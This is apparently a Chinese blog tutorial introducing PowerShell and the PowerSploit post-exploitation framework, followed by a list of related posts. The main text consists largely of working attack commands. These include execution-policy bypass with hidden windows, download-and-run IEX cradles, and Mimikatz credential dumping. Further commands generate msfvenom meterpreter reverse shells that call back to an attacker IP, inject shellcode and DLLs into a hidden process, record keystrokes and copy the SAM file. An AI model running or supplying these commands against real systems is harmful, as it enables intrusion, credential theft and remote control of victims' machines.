Powershell & Powersploit 入门

最新推荐文章于 2024-07-09 11:38:25 发布
最新推荐文章于 2024-07-09 11:38:25 发布
阅读量884 收藏 2
点赞数

前言

PowerShell 是运行在 Windows上实现系统和应用程序管理自动化的命令行脚本环境。你可以把它看成是命令行提示符 cmd.exe 的扩充,或是颠覆。Powershell 需要.NET环境的支持,同时支持.NET对象。其可读性,易用性,可以位居当前所有 shell 之首。


当前 PowerShell 有四版本,分别为 1.0,2.0,3.0 ,4.0

PowerShell简介



PowerShell脚本

* 本地权限绕过执行 PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1 

* 本地隐藏权限绕过执行脚本 PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive-NoProfile -WindowStyle Hidden(隐藏窗口) -File xxx.ps1

 

* 直接用IEX下载远程的PS1脚本回来权限绕过执行 powershell "IEX (New-ObjectNet.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

 

* 远程代码执行 IEX (New-Object

Net.WebClient).DownloadString(“http://<ip_address>/path/xxx.ps1”)

PowerSploit简介

一款基于powershell的后渗透(Post-Exploitation)框架,集成大量渗透相关模块和功能。

https://github.com/mattifestation/PowerSploit

Linux下简易安装和搭建Powersploit(用于测试,请勿使用非法用途)

Linux git clone powerspolit


开启Apache服务


搭建简易可下载powersploit脚本的服务器


Powersploit模块简介

* CodeExecution 在目标主机执行代码

* ScriptModification 在目标主机上创建或修改脚本

* Persistence 后门脚本(持久性控制)

* AntivirusBypass 发现杀软查杀特征

* Exfiltration 目标主机上的信息搜集工具

* Mayhem 蓝屏等破坏性脚本

* Recon 以目标主机为跳板进行内网信息侦查

Powersploit 模块运用

Invoke-Shellcode 此模块结合MSF使用可以达到意想不到的效果,在这理就不介绍。

先在目标主机安装“Invoke-Shellcode”脚本,使用Get-Help + 脚本名可以查看使用方法:

命令格式:

IEX (New-Object Net.WebClient).DownloadString("http://IP Adress/CodeExecutio

n/Invoke--Shellcode.ps1")


在MSF里面使用reverse_https模块进行反弹,设置如下


本来在Invoke-Shellcode直接使用以下这条命令进行反弹的:

Invoke-Shellcode -Payload windows/meterpreter/reverse_https –Lhost 192.168.146.129 -Lport 4444 -Force

但是Powersploit更新到了3.0, Invoke-Shellcode脚本没有Lhost和Lport参数,所以我们需要用到另外一种方法实现。

使用msfvenom生成一个powershell脚本。

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.110.129 LPORT=4444 -f powershell -o /var/www/html/tes

IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.129/CodeExecution/Invoke-Shellcode.ps1")
IEX (New-Object Net.WebClient).DownloadString("http://192.168.110.129/test")
Invoke-Shellcode -Shellcode ($buf)

进程注入

首先创建一个隐藏的进程:

Start-Process c:\windows\system32\notepad.exe -WindowStyle Hidden

使用Get-Process命令查看当前进程,记住你刚刚创建的隐藏进程ID


然后使用Invoke-Shellcode脚本进行进程注入

Invoke-Shellcode -ProcessID 2384 -Shellcode ($buf)


要是你的Powersploit是2.2版本的那么可以直接使用以下命令

Invoke-Shellcode -ProcessID 2384 –Payload

windows/meterpreter/reverse_https -Lhost 192.168.100.129 -Lport 4444

DLL注入

Invoke-DLLInjection 是DLL注入脚本

首先下载安装DLL注入脚本到目标机器

IEX (New-Object Net.WebClient).DownloadString("http://192.168.110.129/CodeExecution/Inv

oke-DllInjection.ps1")

 

在MSF里面生成一个DLL注入脚本,然后下载DLL文件使用Invoke-DLLInjection脚本来实现DLL注入

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.110.129 LPORT=4444 -f dll –o /var/www/html/msf.dll


为什么使我们的注入更加隐蔽,我们开启一个隐藏进程来进行DLL注入

Start-Process c:\windows\system32\notepad.exe -WindowStyle Hidden


Invoke-DllInjection -ProcessID 4080 -Dll .\msf.dll



Invoke-Portscan端口扫描

Invoke-Portscan -Hosts <IP Adress/Rangr> -Ports


nvoke-Mimikatz DUMP密码(注意此脚本需要用管理员权限运行)

Invoke-Mimikatz –DumpCreds也可以直接运行


Get-Keystrokes 键盘记录器

Get-Keystrokes -LogPath + <保存位置>


Invoke-NinjaCopy 万能复制

Invoke-NinjaCopy -Path <需要复制的文件> -LocalDestination <复制文件保存位置>

像windows主机里有个数据库SAM文件,里面数据很多有价值的信息,普通的COPY命令是无法复制的,使用万能复制可以复制SAM文件


Invoke-ReverseDnsLookup DNS查询(好像没什么用- -!,望大家告诉我这玩意有什么用)

Invoke-ReverseDnsLookup -IpRange <IP_Address/Range>


Get-HttpStatus  网站目录检测(好像没什么用)

Get-HttpStatus –Target <IP Address> + 字典 (如果遇到的是HTTPS的那么后面加-UseSSL,在其他端口的那么 –Port )


FLy_鹏程万里
关注
专栏目录
shell脚本【符号1】 &amp;amp;的使用:后台运行/文件描述符
huayangshiboqi的博客
06-16 1947
后台进程符号:&amp;amp;本篇博客将会介绍符号“&amp;amp;”在不同场景下的使用,包括:使用1:后台运行,包括后台一些操作,作业引用、怎样提交后台作业、怎样拉回前台查看等等使用2:文件描述符引用一、后台运行:          ① 作用:提供后台运行机制。可以以后台进程方式运行命令,而无需等待命令执行完成      ② 使用:在命令行最后加一个“&amp;amp;”即可。      ③ 表现方式:增加“&amp;am...
Powershell框架&DLL劫持-权限提升
weixin_45701675的博客
11-19 1036
powershell简介 Windows7以上的操作系统默认安装 PowerShell脚本可以运行在内存中,不需要写入磁盘 可以从另一个系统中下载PowerShell脚本并执行 目前很多工具都是基于PowerShell开发的 很多安全软件并不能检测到PowerShell的活动 cmd.exe通常会被阻止运行,但是PowerShell不会 可以用来管理活动目录 本次介绍两个项目:本地提权信息探针项目-JAWS&amp;PowerSploit https://github.com/411Hall
PowerSploit渗透教程
weixin_43749601的博客
03-21 2137
简介 PowerSploit是一款基于PowerShell的后渗透框架软件,包含很多Powershell攻击脚本,它们主要是用于渗透中的信息侦查、权限提升、权限维持。 https://github.com/mattifestation/PowerSploit Linux下安装和搭建Powersploit 开启Apache服务 将下载好的文件放在/var/www/html目录,搭建一个简易的服务器 在网页中打开http://localhost/PowerSploit-master/ Powersploi
【内网渗透】MSF渗透阶段的常用指令笔记
最新发布
uuzeray的博客
07-09 1489
不需要访问目标主机磁盘,所以也没什么入侵的痕迹。download nimeia.txt /root/Desktop/ # 下载文件到本机上如:download C:\boot.ini /root/或者download C:\"ProgramFiles"\Tencent\QQ\Users\295。run#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。
PowerSploit 使用方法
weixin_44844556的博客
03-13 349
powersploit
PowerSploit 搭建
weixin_46104215的博客
11-07 753
PowerSploit 是一款基于powershell 的后渗透(Post-Exploitation)框架软件,包含很多powershell攻击脚本,它们主要用于渗透中的信息侦察,权限提升,权限维持 下载地址:https://github.com/PowerShellMafia/PowerSploit 1.直接在 kali 中下载,git命令 2.开启 Apache 服务,在网页输入http://ip 地址,可以看到成功开启 service apache2 start 3. 简易服务...
linux shell amp,Linux shell的&&和||
weixin_42515372的博客
05-13 109
shell 在执行某个命令的时候,会返回一个返回值,该返回值保存在 shell 变量 $? 中。当 $? == 0 时,表示执行成功;当 $? == 1 时,表示执行失败。有时候,下一条命令依赖前一条命令是否执行成功。如:在成功地执行一条命令之后再执行另一条命令,或者在一条命令执行失败后再执行另一条命令等。shell 提供了 &amp;&amp; 和 || 来实现命令执行控制的功能,shell 将...
Windows&amp;Linux文件传输方式总结.doc
07-08
例如,可以使用`powershell (new-object System.Net.WebClient).DownloadFile()`命令直接下载远程文件,或者使用`powershell -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring())”`命令执行...
mingw不能安装_Fortran软件安装&amp;环境配置:MinGW-w64(命令)/Parallel Studio(图形)
weixin_39757212的博客
10-22 598
Fortran是科学计算界经典而常青的重要语言之一,尤其在高性能计算 (HPC) 领域。时至今日,英特尔 (Intel) 公司仍在为它提供高性能的函数库和语言特性支持,代表软件产品就是Parallel Studio,这是一个以Fortran编译器ifort、C/C++编译器icl为核心的庞大软件库。与此同时,一个著名且仍然活跃的开源项目MinGW-w64 (Minimalist GNU for W...
HTB Arctic[ATT&CK模型]writeup系列7
重新启程
02-05 3592
目录 0x00 靶机情况 0x01 ATT&amp;CK ATT&amp;CK能用来干什么? 网空威胁行为体(CyberThreat Actors) ATT&amp;CK模型 TTP的定义 0x02 PRE-ATT&amp;CK 一、Priority Definition(优先级定义) 二、Target Selection(选择目标) 三、Information Gat...
Powershell 脚本实现批量更新文件
jingxiang19951125的博客
11-25 442
Jenkins构建项目时,可以执行Powershell脚本,实现构建、打包等功能。现需要批量更新项目文件 AssemblyInfo.cs 中版本信息。 #批量修改 AssemblyInfo.cs 文件中 AssemblyVersion &amp; AssemblyFileVersion $newVer = "2.2.0.0" $newFileVer = "2.2.0.0" #根据文件路径,找到项目根路径 if($rawworkdir.Path -like "*\build" ){ Se
PowerSploit的使用
浅笑996的博客
03-26 663
Invoke-Mimikatz(依赖管理员) Import-Module .\invoke-mimikatz.ps1 Invoke-Mimikatz –DumpCreds 使用Invoke-Mimikatz –command “mimikatz命令”来执行命令: Invoke-Mimikatz –command "token::elevate" Invoke-Ninjacopy (依赖管理...
PowerSploit的学习
https://www.cnblogs.com/zpchcbd/
09-12 281
PowerSploit是Microsoft PowerShell模块的集合,可用于在评估的所有阶段帮助渗透测试人员。PowerSploit由以下模块和脚本组成: CodeExecution 在目标主机执行代码 ScriptModification 在目标主机上创建或修改脚本 Persistence 后门脚本(持久性控制) AntivirusBypass 发现杀软查杀特征 Exfiltration ...
linux shell指令 amp,shell入门基础&amp;常见命令及用法
weixin_36003864的博客
05-12 296
shellshell是一个命令解释器,实际是一个程序,/bin/bash,linux中所有的命令都由它来解释,有自己的语法shell脚本以.sh结尾shell语法+linux命令注释:单行注释 :#多行注释 ::<shell执行方式bash /path/to/script-name 或 /bin/bash /path/to/script-name (强烈推荐使用)/path/to...
11.PowerSploit攻击指南
weixin_30532759的博客
12-23 257
本人小白,写这篇文章主要记录一下自己的PowerShell学习之路,大牛请绕道:https://www.anquanke.com/subject/id/90541 首先PowerShell的攻击工具有以下几种: PowerShell:这是众多PowerShell攻击工具中被广泛使用的PowerShell后期的漏洞利用框架,常用来进行信息探测,特权提升,凭证窃取,持久化等操作。 Nis...
shell &> 与 >> 的区别
u011540803的专栏
07-29 1355
1.expr 5 + 1 运行结果:6 2.expr 5 + 1 >>/dev/null 运行结果:  3.expr 5 + 1 &>/dev/nul 运行结果:   1.expr 5 + a 运行结果:expr: non-numeric argument 2.expr 5 + a >>/dev/null 运行结果: expr: non-numeric argument 3
PowerSploit 之 Invoke-ShellCode
weixin_46104215的博客
11-08 1616
Shellcode为16进制的机器码,根据不同的任务可能是发出一条系统调用或建立一个高权限的Shell,Shellcode也就由此得名。它的最终目的是取得目标机器的控制权。(一段用于利用软件漏洞而执行的代码) 反向连接的shellcode: 当目标计算机在防火墙后时,防火墙不允许外边的计算机主动访问目标机器。所以即使采用shellcode建立了服务后门,还是不能与目标计算机建立连接。反向连接的含义就是,让目标计算机通过特定的IP(攻击者的)和端口反向连接到攻击者,也可以设定为在固定的时间段主动来建立连接.
powershell免杀思路分析
mingyqf的博客
12-14 3189
powershell免杀思路分析 写在前面 powershell做为微软windows系统自带的软件包,具有十分强大的功能,Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的功能,在IT/系统管理员间得到普及。总的特点来说就是:方便、有效和隐蔽。举例来说,利用这些合法工具可以让威胁活动混在正常的网络流量或IT/系统管理工作内,也让这些恶意威胁能够留下较少的痕迹,使得侦测更加困难。在经过各种变形、加密、混淆、恶意文件放在远程服
WinServer-PowerShell基础
weixin_30752699的博客
04-12 55
命令的参数: [-name] 这个参数必须要有,string表示name参数接受什么样的实参,<>表示参数可以接受的实参类型,通常出现set get add都会伴随着必须参数 [-name] 非必须,只接受string类型 [-name[]] 非必须,只接受string类型,可以接受多个string参数 [-name{ Negotiate | Basic }] 仅接受Nego...
Windows PowerShell入门指南:系统管理新境界
PowerShell入门.pdf”是一份介绍PowerShell基础知识和技术的文档,主要针对系统管理员,旨在帮助读者理解和掌握这款强大的系统管理工具。 PowerShell是由微软开发的一种命令行界面和脚本语言,它构建在.Net ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值